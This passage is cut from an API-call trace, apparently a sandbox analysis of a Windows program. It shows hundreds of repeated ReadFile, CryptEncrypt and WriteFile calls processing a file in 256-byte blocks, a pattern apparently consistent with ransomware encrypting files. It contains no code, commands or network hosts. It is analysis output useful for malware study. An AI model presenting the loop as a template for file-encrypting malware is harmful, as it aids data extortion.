returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.644] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.644] GetLastError () returned 0x0 [0149.644] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.644] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.645] GetLastError () returned 0x0 [0149.645] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.645] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.645] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.646] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.646] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.646] GetLastError () returned 0x0 [0149.646] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.647] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.647] GetLastError () returned 0x0 [0149.647] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.647] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.648] GetLastError () returned 0x0 [0149.648] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.648] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.648] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.649] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.649] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.649] GetLastError () returned 0x0 [0149.649] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: 